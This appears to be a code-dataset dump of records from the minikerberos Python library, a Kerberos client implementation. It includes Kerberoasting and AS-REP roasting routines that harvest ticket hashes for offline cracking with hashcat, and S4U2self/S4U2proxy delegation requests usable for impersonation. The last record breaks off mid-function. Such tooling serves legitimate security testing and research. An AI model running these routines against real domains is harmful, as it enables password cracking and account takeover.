kcomm.get_TGT(override_etype = override_etype, decrypt_tgt = False)
tgts.append(kcomm.kerberos_TGT)
except Exception as e:
logger.debug('Error while roasting client %s/%s Reason: %s' % (cred.domain, cred.username, str(e)))
continue
results = []
for tgt in tgts:
results.append(TGTTicket2hashcat(tgt))
return results | Requests TGT tickets for all users specified in the targets list
creds: list : the users to request the TGT tickets for
override_etype: list : list of supported encryption types | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/security.py#L75-L96 | [
"def get_TGT(self, override_etype = None, decrypt_tgt = True):\n\t\"\"\"\n\tdecrypt_tgt: used for asreproast attacks\n\tSteps performed:\n\t\t1. Send and empty (no encrypted timestamp) AS_REQ with all the encryption types we support\n\t\t2. Depending on the response (either error or AS_REP with TGT) we either send ... | class APREPRoast:
def __init__(self, ksoc):
self.ksoc = ksoc
|
skelsec/minikerberos | minikerberos/security.py | Kerberoast.run | python | def run(self, targets, override_etype = [2, 3, 16, 23, 17, 18]):
if not self.kcomm:
try:
self.kcomm = KerbrosComm(self.ccred, self.ksoc)
self.kcomm.get_TGT()
except Exception as e:
logger.exception('Failed to get TGT ticket! Reason: %s' % str(e))
tgss = []
for target in targets:
try:
tgs, encTGSRepPart, key = self.kcomm.get_TGS(target, override_etype = override_etype)
tgss.append(tgs)
except Exception as e:
logger.debug('Failed to get TGS ticket for user %s/%s/%s! Reason: %s' % (target.domain, str(target.service), target.username, str(e)))
continue
results = []
for tgs in tgss:
results.append(TGSTicket2hashcat(tgs))
return results | Requests TGS tickets for all service users specified in the targets list
targets: list : the SPN users to request the TGS tickets for
allhash: bool : Return all enctype tickets, ot just 23 | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/security.py#L104-L132 | [
"def TGSTicket2hashcat(res):\t\t\n\ttgs_encryption_type = int(res['ticket']['enc-part']['etype'])\n\ttgs_name_string = res['ticket']['sname']['name-string'][0]\n\ttgs_realm = res['ticket']['realm']\n\ttgs_checksum = res['ticket']['enc-part']['cipher'][:16]\n\ttgs_encrypted_data2 ... | class Kerberoast:
def __init__(self, ccred, ksoc, kcomm = None):
self.ccred = ccred
self.ksoc = ksoc
self.kcomm = kcomm
def run(self, targets, override_etype = [2, 3, 16, 23, 17, 18]):
"""
Requests TGS tickets for all service users specified in the targets list
targets: list : the SPN users to request the TGS tickets for
allhash: bool : Return all enctype tickets, ot just 23
"""
if not self.kcomm:
try:
self.kcomm = KerbrosComm(self.ccred, self.ksoc)
self.kcomm.get_TGT()
except Exception as e:
logger.exception('Failed to get TGT ticket! Reason: %s' % str(e))
tgss = []
for target in targets:
try:
tgs, encTGSRepPart, key = self.kcomm.get_TGS(target, override_etype = override_etype)
tgss.append(tgs)
except Exception as e:
logger.debug('Failed to get TGS ticket for user %s/%s/%s! Reason: %s' % (target.domain, str(target.service), target.username, str(e)))
continue
results = []
for tgs in tgss:
results.append(TGSTicket2hashcat(tgs))
return results
|
skelsec/minikerberos | minikerberos/crypto/PBKDF2/pbkdf2.py | pbkdf2 | python | def pbkdf2(password, salt, iters, keylen, digestmod = hashlib.sha1):
h = hmac.new(password, digestmod=digestmod)
def prf(data):
hm = h.copy()
hm.update(data)
return bytearray(hm.digest())
key = bytearray()
i = 1
while len(key) < keylen:
T = U = prf(salt + struct.pack('>i', i))
for _ in range(iters - 1):
U = prf(U)
T = bytearray(x ^ y for x, y in zip(T, U))
key += T
i += 1
return key[:keylen] | Run the PBKDF2 (Password-Based Key Derivation Function 2) algorithm
and return the derived key. The arguments are:
password (bytes or bytearray) -- the input password
salt (bytes or bytearray) -- a cryptographic salt
iters (int) -- number of iterations
keylen (int) -- length of key to derive
digestmod -- a cryptographic hash function: either a module
supporting PEP 247, a hashlib constructor, or (in Python 3.4
or later) the name of a hash function.
For example:
>>> import hashlib
>>> from binascii import hexlify, unhexlify
>>> password = b'Squeamish Ossifrage'
>>> salt = unhexlify(b'1234567878563412')
>>> hexlify(pbkdf2(password, salt, 500, 16, hashlib.sha1))
b'9e8f1072bdf5ef042bd988c7da83e43b' | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/crypto/PBKDF2/pbkdf2.py#L7-L45 | [
"def prf(data):\n\thm = h.copy()\n\thm.update(data)\n\treturn bytearray(hm.digest())\n"
] |
#https://codereview.stackexchange.com/questions/87538/python-pbkdf2-using-core-modules
import hmac
import struct
import hashlib
|
skelsec/minikerberos | minikerberos/communication.py | KerberosSocket.from_connection_string | python | def from_connection_string(s, soc_type = KerberosSocketType.TCP):
ip = None
port = 88
t, addr = s.rsplit('@')
if addr.find(':') == -1:
ip = addr
else:
ip, port = addr.split(':')
return KerberosSocket(ip, port = int(port), soc_type = soc_type) | <credentials>@<ip_or_hostname>:<port> | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/communication.py#L42-L55 | null | class KerberosSocket:
def __init__(self, ip, port = 88, soc_type = KerberosSocketType.TCP):
self.soc_type = soc_type
self.dst_ip = ip
self.dst_port = int(port)
self.soc = None
def __str__(self):
t = '===KerberosSocket===\r\n'
t += 'soc_type: %s\r\n' % self.soc_type
t += 'dst_ip: %s\r\n' % self.dst_ip
t += 'dst_port: %s\r\n' % self.dst_port
return t
@staticmethod
def from_connection_string(s, soc_type = KerberosSocketType.TCP):
"""
<credentials>@<ip_or_hostname>:<port>
"""
ip = None
port = 88
t, addr = s.rsplit('@')
if addr.find(':') == -1:
ip = addr
else:
ip, port = addr.split(':')
return KerberosSocket(ip, port = int(port), soc_type = soc_type)
def get_addr_str(self):
return '%s:%d' % (self.dst_ip, self.dst_port)
def create_soc(self):
if self.soc_type == KerberosSocketType.TCP:
self.soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.soc.connect((self.dst_ip, self.dst_port))
elif self.soc_type == KerberosSocketType.UDP:
self.soc = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
else:
raise Exception('Unknown socket type!')
def sendrecv(self, data, throw = True):
self.create_soc()
try:
if self.soc_type == KerberosSocketType.TCP:
length = len(data).to_bytes(4, byteorder = 'big', signed = False)
self.soc.sendall(length + data)
buff = b''
total_length = -1
while True:
temp = b''
temp = self.soc.recv(4096)
if temp == b'':
break
buff += temp
if total_length == -1:
if len(buff) > 4:
total_length = int.from_bytes(buff[:4], byteorder = 'big', signed = False)
if total_length == 0:
raise Exception('Returned data length is 0! This means the server did not understand our message')
if total_length != -1:
if len(buff) == total_length + 4:
buff = buff[4:]
break
elif len(buff) > total_length + 4:
raise Exception('Got too much data somehow')
else:
continue
elif self.soc_type == KerberosSocketType.UDP:
self.soc.sendto(data, (self.dst_ip, self.dst_port))
while True:
buff, addr = self.soc.recvfrom(65535)
if addr[0] == self.dst_ip:
break
else:
# got a message from a different IP than the target, strange!
# continuing, but this might result in an infinite loop
continue
krb_message = KerberosResponse.load(buff)
if krb_message.name == 'KRB_ERROR' and throw == True:
raise KerberosError(krb_message)
return krb_message
finally:
self.soc.close()
|
skelsec/minikerberos | minikerberos/communication.py | KerbrosComm.from_tgt | python | def from_tgt(ksoc, tgt, key):
kc = KerbrosComm(None, ksoc)
kc.kerberos_TGT = tgt
kc.kerberos_cipher_type = key['keytype']
kc.kerberos_session_key = Key(kc.kerberos_cipher_type, key['keyvalue'])
kc.kerberos_cipher = _enctype_table[kc.kerberos_cipher_type]
return kc | Sets up the kerberos object from tgt and the session key.
Use this function when pulling the TGT from ccache file. | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/communication.py#L138-L149 | null | class KerbrosComm:
def __init__(self,ccred, ksoc, ccache = None):
self.usercreds = ccred
self.ksoc = ksoc
self.user_ccache = ccache
self.ccache = CCACHE()
self.kerberos_session_key = None
self.kerberos_TGT = None
self.kerberos_TGT_encpart = None
self.kerberos_TGS = None
self.kerberos_cipher = None
self.kerberos_cipher_type = None
self.kerberos_key = None
@staticmethod
def from_tgt(ksoc, tgt, key):
    """Build a KerbrosComm from an already-obtained TGT and its session key.

    Intended for the case where the TGT was pulled from a ccache file
    rather than requested live; no user credentials are needed.
    """
    etype = key['keytype']
    comm = KerbrosComm(None, ksoc)
    comm.kerberos_TGT = tgt
    comm.kerberos_cipher_type = etype
    comm.kerberos_session_key = Key(etype, key['keyvalue'])
    comm.kerberos_cipher = _enctype_table[etype]
    return comm
def do_preauth(self, rep):
    """Answer a KDC preauthentication challenge.

    ``rep`` is the native KRB_ERROR reply whose 'e-data' advertises the
    server's supported encryption types. Re-sends the AS_REQ with an
    encrypted timestamp and returns the KDC's response message. Also
    records the negotiated cipher/key on ``self``.
    """
    # Collect the encryption types (and their salts) the server advertises.
    supp_enc_methods = collections.OrderedDict()
    for enc_method in METHOD_DATA.load(rep['e-data']).native:
        data_type = PaDataType(enc_method['padata-type'])
        if data_type not in (PaDataType.ETYPE_INFO, PaDataType.ETYPE_INFO2):
            continue
        loader = ETYPE_INFO if data_type == PaDataType.ETYPE_INFO else ETYPE_INFO2
        enc_info_list = loader.load(enc_method['padata-value'])
        for enc_info in enc_info_list.native:
            etype = EncryptionType(enc_info['etype'])
            supp_enc_methods[etype] = enc_info['salt']
            logger.debug('Server supports encryption type %s with salt %s' % (etype.name, enc_info['salt']))

    logger.debug('Constructing TGT request with auth data')
    # AS_REQ with an encrypted timestamp for authentication.
    pa_data_1 = {
        'padata-type': int(PADATA_TYPE('PA-PAC-REQUEST')),
        'padata-value': PA_PAC_REQUEST({'include-pac': True}).dump(),
    }
    now = datetime.datetime.utcnow()
    # ASN.1-encoded timestamp that will prove knowledge of the user key.
    timestamp = PA_ENC_TS_ENC({'patimestamp': now, 'pausec': now.microsecond}).dump()

    supp_enc = self.usercreds.get_preferred_enctype(supp_enc_methods)
    logger.debug('Selecting common encryption type: %s' % supp_enc.name)
    self.kerberos_cipher = _enctype_table[supp_enc.value]
    self.kerberos_cipher_type = supp_enc.value
    self.kerberos_key = Key(self.kerberos_cipher.enctype, self.usercreds.get_key_for_enctype(supp_enc))
    enc_timestamp = self.kerberos_cipher.encrypt(self.kerberos_key, 1, timestamp, None)

    pa_data_2 = {
        'padata-type': int(PADATA_TYPE('ENC-TIMESTAMP')),
        'padata-value': EncryptedData({'etype': supp_enc.value, 'cipher': enc_timestamp}).dump(),
    }
    kdc_req_body = {
        'kdc-options': KDCOptions(set(['forwardable','renewable','proxiable'])),
        'cname': PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': [self.usercreds.username]}),
        'realm': self.usercreds.domain.upper(),
        'sname': PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': ['krbtgt', self.usercreds.domain.upper()]}),
        'till': now + datetime.timedelta(days=1),
        'rtime': now + datetime.timedelta(days=1),
        'nonce': secrets.randbits(31),
        # Encrypt only with the negotiated type.
        'etype': [supp_enc.value],
    }
    kdc_req = {
        'pvno': krb5_pvno,
        'msg-type': MESSAGE_TYPE.KRB_AS_REQ.value,
        'padata': [pa_data_2, pa_data_1],
        'req-body': KDC_REQ_BODY(kdc_req_body),
    }
    req = AS_REQ(kdc_req)
    logger.debug('Sending TGT request to server')
    return self.ksoc.sendrecv(req.dump())
def get_TGT(self, override_etype = None, decrypt_tgt = True):
    """
    Request a TGT from the KDC, storing the ticket and session key on self.

    decrypt_tgt: used for asreproast attacks; when False the AS-REP is
        returned undecrypted (we may not even have the key material for it)
    override_etype: optional list of etype values (int) to advertise
        instead of the credential's supported enctypes

    Steps performed:
        1. Send an empty (no encrypted timestamp) AS_REQ with all the encryption types we support
        2. Depending on the response (either error or AS_REP with TGT) we either send another AS_REQ with the encrypted data or return the TGT (or fail miserably)
        3. PROFIT
    """
    logger.debug('Generating initial TGT without authentication data')
    now = datetime.datetime.utcnow()

    # AS-REQ body; times one day out, random nonce.
    kdc_req_body = {}
    kdc_req_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','proxiable']))
    kdc_req_body['cname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': [self.usercreds.username]})
    kdc_req_body['realm'] = self.usercreds.domain.upper()
    kdc_req_body['sname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': ['krbtgt', self.usercreds.domain.upper()]})
    kdc_req_body['till'] = now + datetime.timedelta(days=1)
    kdc_req_body['rtime'] = now + datetime.timedelta(days=1)
    kdc_req_body['nonce'] = secrets.randbits(31)
    if override_etype is None:
        kdc_req_body['etype'] = self.usercreds.get_supported_enctypes()
    else:
        kdc_req_body['etype'] = override_etype

    # Ask the KDC to include a PAC in the ticket.
    pa_data_1 = {}
    pa_data_1['padata-type'] = int(PADATA_TYPE('PA-PAC-REQUEST'))
    pa_data_1['padata-value'] = PA_PAC_REQUEST({'include-pac': True}).dump()

    kdc_req = {}
    kdc_req['pvno'] = krb5_pvno
    kdc_req['msg-type'] = MESSAGE_TYPE.KRB_AS_REQ.value
    kdc_req['padata'] = [pa_data_1]
    kdc_req['req-body'] = KDC_REQ_BODY(kdc_req_body)

    req = AS_REQ(kdc_req)
    logger.debug('Sending initial TGT to %s' % self.ksoc.get_addr_str())
    rep = self.ksoc.sendrecv(req.dump(), throw = False)
    if rep.name != 'KRB_ERROR':
        # User can do kerberos auth without preauthentication!
        self.kerberos_TGT = rep.native
        # If we want to roast the asrep (tgt rep) part then we dont even have
        # the proper keys to decrypt, so we just return; the asrep can be
        # extracted from this object anyhow.
        if not decrypt_tgt:
            return
        # etype 23 == ARCFOUR-HMAC-MD5 (RC4), the enctype derivable from the
        # NT hash alone.
        self.kerberos_cipher = _enctype_table[23]
        self.kerberos_cipher_type = 23
        self.kerberos_key = Key(self.kerberos_cipher.enctype, self.usercreds.get_key_for_enctype(EncryptionType.ARCFOUR_HMAC_MD5))
    else:
        if rep.native['error-code'] != KerberosErrorCode.KDC_ERR_PREAUTH_REQUIRED.value:
            raise KerberosError(rep)
        rep = rep.native
        logger.debug('Got reply from server, asking to provide auth data')  # fixed typo: was 'asikg'
        rep = self.do_preauth(rep)
        logger.debug('Got valid TGT response from server')
        rep = rep.native
        self.kerberos_TGT = rep

    # Decrypt the AS-REP enc-part (key usage 3) and cache the session key.
    cipherText = rep['enc-part']['cipher']
    temp = self.kerberos_cipher.decrypt(self.kerberos_key, 3, cipherText)
    self.kerberos_TGT_encpart = EncASRepPart.load(temp).native
    self.kerberos_session_key = Key(self.kerberos_cipher.enctype, self.kerberos_TGT_encpart['key']['keyvalue'])
    self.ccache.add_tgt(self.kerberos_TGT, self.kerberos_TGT_encpart, override_pp = True)
    logger.debug('Got valid TGT')
    return
def get_TGS(self, spn_user, override_etype = None):
    """Fetch a service ticket (TGS) for ``spn_user`` using the cached TGT.

    spn_user: KerberosTarget describing the service principal.
    override_etype: None or list of etype values (int); mostly used for
        kerberoasting — overrides the supported etypes advertised to the
        KDC so any ticket enctype can be received.

    Returns (tgs, encTGSRepPart, key): the raw TGS-REP, its decrypted
    enc-part and the ticket session key.
    """
    logger.debug('Constructing TGS request for user %s' % spn_user.get_formatted_pname())
    now = datetime.datetime.utcnow()

    # Request body; the etype falls back to the TGT's cipher type.
    kdc_req_body = {
        'kdc-options': KDCOptions(set(['forwardable','renewable','renewable_ok', 'canonicalize'])),
        'realm': spn_user.domain.upper(),
        'sname': PrincipalName({'name-type': NAME_TYPE.SRV_INST.value, 'name-string': spn_user.get_principalname()}),
        'till': now + datetime.timedelta(days=1),
        'nonce': secrets.randbits(31),
        'etype': override_etype if override_etype else [self.kerberos_cipher_type],
    }

    # Authenticator proving possession of the TGT session key.
    authenticator_data = {
        'authenticator-vno': krb5_pvno,
        'crealm': Realm(self.kerberos_TGT['crealm']),
        'cname': self.kerberos_TGT['cname'],
        'cusec': now.microsecond,
        'ctime': now,
    }
    authenticator_data_enc = self.kerberos_cipher.encrypt(self.kerberos_session_key, 7, Authenticator(authenticator_data).dump(), None)

    ap_req = {
        'pvno': krb5_pvno,
        'msg-type': MESSAGE_TYPE.KRB_AP_REQ.value,
        'ap-options': APOptions(set()),
        'ticket': Ticket(self.kerberos_TGT['ticket']),
        'authenticator': EncryptedData({'etype': self.kerberos_cipher_type, 'cipher': authenticator_data_enc}),
    }
    pa_data_1 = {
        'padata-type': PaDataType.TGS_REQ.value,
        'padata-value': AP_REQ(ap_req).dump(),
    }
    kdc_req = {
        'pvno': krb5_pvno,
        'msg-type': MESSAGE_TYPE.KRB_TGS_REQ.value,
        'padata': [pa_data_1],
        'req-body': KDC_REQ_BODY(kdc_req_body),
    }

    req = TGS_REQ(kdc_req)
    logger.debug('Constructing TGS request to server')
    rep = self.ksoc.sendrecv(req.dump())
    logger.debug('Got TGS reply, decrypting...')
    tgs = rep.native

    # Key usage 8: TGS-REP enc-part, encrypted under the TGT session key.
    encTGSRepPart = EncTGSRepPart.load(self.kerberos_cipher.decrypt(self.kerberos_session_key, 8, tgs['enc-part']['cipher'])).native
    key = Key(encTGSRepPart['key']['keytype'], encTGSRepPart['key']['keyvalue'])

    self.ccache.add_tgs(tgs, encTGSRepPart)
    logger.debug('Got valid TGS reply')
    self.kerberos_TGS = tgs
    return tgs, encTGSRepPart, key
#https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-sfu/6a8dfc0c-2d32-478a-929f-5f9b1b18a169
def S4U2self(self, user_to_impersonate, supp_enc_methods = [EncryptionType.DES_CBC_CRC,EncryptionType.DES_CBC_MD4,EncryptionType.DES_CBC_MD5,EncryptionType.DES3_CBC_SHA1,EncryptionType.ARCFOUR_HMAC_MD5,EncryptionType.AES256_CTS_HMAC_SHA1_96,EncryptionType.AES128_CTS_HMAC_SHA1_96]):
    """
    Perform the S4U2self exchange: request a service ticket to our own
    account on behalf of ``user_to_impersonate`` (see the MS-SFU link above).

    user_to_impersonate : KerberosTarget class
    supp_enc_methods : candidate encryption types (the mutable default list
        is only read here, never mutated)

    Returns (tgs, encTGSRepPart, key).
    """
    # A valid TGT is required to build the AP-REQ below.
    if not self.kerberos_TGT:
        logger.debug('S4U2self invoked, but TGT is not available! Fetching TGT...')
        self.get_TGT()
    supp_enc = self.usercreds.get_preferred_enctype(supp_enc_methods)
    auth_package_name = 'Kerberos'
    now = datetime.datetime.utcnow()

    ###### Calculating authenticator data
    authenticator_data = {}
    authenticator_data['authenticator-vno'] = krb5_pvno
    authenticator_data['crealm'] = Realm(self.kerberos_TGT['crealm'])
    authenticator_data['cname'] = self.kerberos_TGT['cname']
    authenticator_data['cusec'] = now.microsecond
    authenticator_data['ctime'] = now
    # Key usage 7: PA-TGS-REQ authenticator, encrypted with the TGT session key.
    authenticator_data_enc = self.kerberos_cipher.encrypt(self.kerberos_session_key, 7, Authenticator(authenticator_data).dump(), None)

    ap_req = {}
    ap_req['pvno'] = krb5_pvno
    ap_req['msg-type'] = MESSAGE_TYPE.KRB_AP_REQ.value
    ap_req['ap-options'] = APOptions(set())
    ap_req['ticket'] = Ticket(self.kerberos_TGT['ticket'])
    ap_req['authenticator'] = EncryptedData({'etype': self.kerberos_cipher_type, 'cipher': authenticator_data_enc})

    pa_data_auth = {}
    pa_data_auth['padata-type'] = PaDataType.TGS_REQ.value
    pa_data_auth['padata-value'] = AP_REQ(ap_req).dump()

    ###### Calculating checksum data
    # Checksum input: little-endian name-type || username || domain || auth package.
    S4UByteArray = NAME_TYPE.PRINCIPAL.value.to_bytes(4, 'little', signed = False)
    S4UByteArray += user_to_impersonate.username.encode()
    S4UByteArray += user_to_impersonate.domain.encode()
    S4UByteArray += auth_package_name.encode()
    logger.debug('S4U2self: S4UByteArray: %s' % S4UByteArray.hex())
    logger.debug('S4U2self: S4UByteArray: %s' % S4UByteArray)
    # Keyed HMAC-MD5 checksum (key usage 17) over the buffer above.
    chksum_data = _HMACMD5.checksum(self.kerberos_session_key, 17, S4UByteArray)
    logger.debug('S4U2self: chksum_data: %s' % chksum_data.hex())
    chksum = {}
    chksum['cksumtype'] = int(CKSUMTYPE('HMAC_MD5'))
    chksum['checksum'] = chksum_data

    ###### Filling out PA-FOR-USER data for impersonation
    pa_for_user_enc = {}
    pa_for_user_enc['userName'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': user_to_impersonate.get_principalname()})
    pa_for_user_enc['userRealm'] = user_to_impersonate.domain
    pa_for_user_enc['cksum'] = Checksum(chksum)
    pa_for_user_enc['auth-package'] = auth_package_name

    pa_for_user = {}
    pa_for_user['padata-type'] = int(PADATA_TYPE('PA-FOR-USER'))
    pa_for_user['padata-value'] = PA_FOR_USER_ENC(pa_for_user_enc).dump()

    ###### Constructing body
    krb_tgs_body = {}
    krb_tgs_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','canonicalize']))
    # sname is ourselves: we request a ticket to our own account.
    krb_tgs_body['sname'] = PrincipalName({'name-type': NAME_TYPE.UNKNOWN.value, 'name-string': [self.usercreds.username]})
    krb_tgs_body['realm'] = self.usercreds.domain.upper()
    krb_tgs_body['till'] = now + datetime.timedelta(days=1)
    krb_tgs_body['nonce'] = secrets.randbits(31)
    krb_tgs_body['etype'] = [supp_enc.value] #selecting according to server's preferences

    krb_tgs_req = {}
    krb_tgs_req['pvno'] = krb5_pvno
    krb_tgs_req['msg-type'] = MESSAGE_TYPE.KRB_TGS_REQ.value
    krb_tgs_req['padata'] = [pa_data_auth, pa_for_user]
    krb_tgs_req['req-body'] = KDC_REQ_BODY(krb_tgs_body)

    req = TGS_REQ(krb_tgs_req)

    logger.debug('Sending S4U2self request to server')
    try:
        reply = self.ksoc.sendrecv(req.dump())
    except KerberosError as e:
        # Error code 16 means delegation is not enabled for this account;
        # the error is re-raised in every case.
        if e.errorcode.value == 16:
            logger.error('S4U2self: Failed to get S4U2self! Error code (16) indicates that delegation is not enabled for this account! Full error: %s' % e)
        raise e
    logger.debug('Got S4U2self reply, decrypting...')
    tgs = reply.native
    # Key usage 8: TGS-REP enc-part, encrypted under the TGT session key.
    encTGSRepPart = EncTGSRepPart.load(self.kerberos_cipher.decrypt(self.kerberos_session_key, 8, tgs['enc-part']['cipher'])).native
    key = Key(encTGSRepPart['key']['keytype'], encTGSRepPart['key']['keyvalue'])
    self.ccache.add_tgs(tgs, encTGSRepPart)
    logger.debug('Got valid TGS reply')
    self.kerberos_TGS = tgs
    return tgs, encTGSRepPart, key
# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-sfu/c920c148-8a9c-42e9-b8e9-db5755cd281b
def S4U2proxy(self, s4uself_ticket, spn_user, supp_enc_methods = [EncryptionType.DES_CBC_CRC,EncryptionType.DES_CBC_MD4,EncryptionType.DES_CBC_MD5,EncryptionType.DES3_CBC_SHA1,EncryptionType.ARCFOUR_HMAC_MD5,EncryptionType.AES256_CTS_HMAC_SHA1_96,EncryptionType.AES128_CTS_HMAC_SHA1_96]):
    """
    Perform the S4U2proxy (constrained delegation) exchange.

    s4uself_ticket: ticket obtained via S4U2self, sent as additional-ticket.
    spn_user: KerberosTarget for the service we delegate to.
    supp_enc_methods: candidate encryption types (the mutable default list
        is only read here, never mutated).

    Returns (tgs, encTGSRepPart, key), like get_TGS()/S4U2self().
    Raises KerberosError on failure; error code 16 means delegation is not
    enabled for this account.
    """
    now = datetime.datetime.utcnow()
    supp_enc = self.usercreds.get_preferred_enctype(supp_enc_methods)

    # PA-PAC-OPTIONS: request resource-based constrained delegation (MS-SFU).
    pa_pac_opts = {}
    pa_pac_opts['padata-type'] = int(PADATA_TYPE('PA-PAC-OPTIONS'))
    pa_pac_opts['padata-value'] = PA_PAC_OPTIONS({'value' : PA_PAC_OPTIONSTypes(set(['resource-based constrained delegation']))}).dump()

    # Authenticator encrypted with the TGT session key (key usage 7).
    authenticator_data = {}
    authenticator_data['authenticator-vno'] = krb5_pvno
    authenticator_data['crealm'] = Realm(self.kerberos_TGT['crealm'])
    authenticator_data['cname'] = self.kerberos_TGT['cname']
    authenticator_data['cusec'] = now.microsecond
    authenticator_data['ctime'] = now
    authenticator_data_enc = self.kerberos_cipher.encrypt(self.kerberos_session_key, 7, Authenticator(authenticator_data).dump(), None)

    ap_req = {}
    ap_req['pvno'] = krb5_pvno
    ap_req['msg-type'] = MESSAGE_TYPE.KRB_AP_REQ.value
    ap_req['ap-options'] = APOptions(set())
    ap_req['ticket'] = Ticket(self.kerberos_TGT['ticket'])
    ap_req['authenticator'] = EncryptedData({'etype': self.kerberos_cipher_type, 'cipher': authenticator_data_enc})

    pa_tgs_req = {}
    pa_tgs_req['padata-type'] = PaDataType.TGS_REQ.value
    pa_tgs_req['padata-value'] = AP_REQ(ap_req).dump()

    krb_tgs_body = {}
    krb_tgs_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','constrained-delegation', 'canonicalize']))
    krb_tgs_body['sname'] = PrincipalName({'name-type': NAME_TYPE.SRV_INST.value, 'name-string': spn_user.get_principalname()})
    krb_tgs_body['realm'] = self.usercreds.domain.upper()
    krb_tgs_body['till'] = now + datetime.timedelta(days=1)
    krb_tgs_body['nonce'] = secrets.randbits(31)
    krb_tgs_body['etype'] = [supp_enc.value] #selecting according to server's preferences
    # The S4U2self ticket rides along as an additional ticket.
    krb_tgs_body['additional-tickets'] = [s4uself_ticket]

    krb_tgs_req = {}
    krb_tgs_req['pvno'] = krb5_pvno
    krb_tgs_req['msg-type'] = MESSAGE_TYPE.KRB_TGS_REQ.value
    krb_tgs_req['padata'] = [pa_tgs_req, pa_pac_opts]
    krb_tgs_req['req-body'] = KDC_REQ_BODY(krb_tgs_body)

    req = TGS_REQ(krb_tgs_req)
    try:
        reply = self.ksoc.sendrecv(req.dump())
    except KerberosError as e:
        if e.errorcode.value == 16:
            logger.error('S4U2proxy: Failed to get S4U2proxy! Error code (16) indicates that delegation is not enabled for this account! Full error: %s' % e)
        raise e

    # BUG FIX: the reply used to be discarded and the method returned None.
    # Decrypt and return it like get_TGS()/S4U2self() so callers actually
    # receive the delegated service ticket. (Key usage 8: TGS-REP enc-part.)
    logger.debug('Got S4U2proxy reply, decrypting...')
    tgs = reply.native
    encTGSRepPart = EncTGSRepPart.load(self.kerberos_cipher.decrypt(self.kerberos_session_key, 8, tgs['enc-part']['cipher'])).native
    key = Key(encTGSRepPart['key']['keytype'], encTGSRepPart['key']['keyvalue'])
    self.ccache.add_tgs(tgs, encTGSRepPart)
    logger.debug('Got valid S4U2proxy reply')
    return tgs, encTGSRepPart, key
def get_something(self, tgs, encTGSRepPart, sessionkey):
    """Build and return a serialized AP_REQ (bytes) for the given TGS ticket.

    tgs: native TGS-REP structure holding the service ticket.
    encTGSRepPart: decrypted enc-part of the TGS-REP; its 'key' field
        supplies the ticket session key enctype used for encryption here.
    sessionkey: Key object used to encrypt the authenticator.
    """
    now = datetime.datetime.utcnow()
    authenticator_data = {}
    authenticator_data['authenticator-vno'] = krb5_pvno
    authenticator_data['crealm'] = Realm(self.kerberos_TGT['crealm'])
    authenticator_data['cname'] = self.kerberos_TGT['cname']
    authenticator_data['cusec'] = now.microsecond
    authenticator_data['ctime'] = now
    # BUG FIX: was a stray print() in library code; route through the logger.
    logger.debug('get_something: ticket session key type: %s' % encTGSRepPart['key']['keytype'])
    cipher = _enctype_table[encTGSRepPart['key']['keytype']]
    # Key usage 11: AP-REQ authenticator (RFC 4120).
    authenticator_data_enc = cipher.encrypt(sessionkey, 11, Authenticator(authenticator_data).dump(), None)

    ap_req = {}
    ap_req['pvno'] = krb5_pvno
    ap_req['msg-type'] = MESSAGE_TYPE.KRB_AP_REQ.value
    ap_req['ticket'] = Ticket(tgs['ticket'])
    ap_req['ap-options'] = APOptions(set([]))
    # NOTE(review): the declared etype is the TGT cipher type while the
    # authenticator above is encrypted with the ticket's key type; if the
    # two ever differ this looks wrong — confirm before changing behavior.
    ap_req['authenticator'] = EncryptedData({'etype': self.kerberos_cipher_type, 'cipher': authenticator_data_enc})
    return AP_REQ(ap_req).dump()
|
skelsec/minikerberos | minikerberos/communication.py | KerbrosComm.get_TGT | python | def get_TGT(self, override_etype = None, decrypt_tgt = True):
logger.debug('Generating initial TGT without authentication data')
now = datetime.datetime.utcnow()
kdc_req_body = {}
kdc_req_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','proxiable']))
kdc_req_body['cname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': [self.usercreds.username]})
kdc_req_body['realm'] = self.usercreds.domain.upper()
kdc_req_body['sname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': ['krbtgt', self.usercreds.domain.upper()]})
kdc_req_body['till'] = now + datetime.timedelta(days=1)
kdc_req_body['rtime'] = now + datetime.timedelta(days=1)
kdc_req_body['nonce'] = secrets.randbits(31)
if override_etype is None:
kdc_req_body['etype'] = self.usercreds.get_supported_enctypes()
else:
kdc_req_body['etype'] = override_etype
pa_data_1 = {}
pa_data_1['padata-type'] = int(PADATA_TYPE('PA-PAC-REQUEST'))
pa_data_1['padata-value'] = PA_PAC_REQUEST({'include-pac': True}).dump()
kdc_req = {}
kdc_req['pvno'] = krb5_pvno
kdc_req['msg-type'] = MESSAGE_TYPE.KRB_AS_REQ.value
kdc_req['padata'] = [pa_data_1]
kdc_req['req-body'] = KDC_REQ_BODY(kdc_req_body)
req = AS_REQ(kdc_req)
logger.debug('Sending initial TGT to %s' % self.ksoc.get_addr_str())
rep = self.ksoc.sendrecv(req.dump(), throw = False)
if rep.name != 'KRB_ERROR':
#user can do kerberos auth without preauthentication!
self.kerberos_TGT = rep.native
#if we want to roast the asrep (tgt rep) part then we dont even have the proper keys to decrypt
#so we just return, the asrep can be extracted from this object anyhow
if decrypt_tgt == False:
return
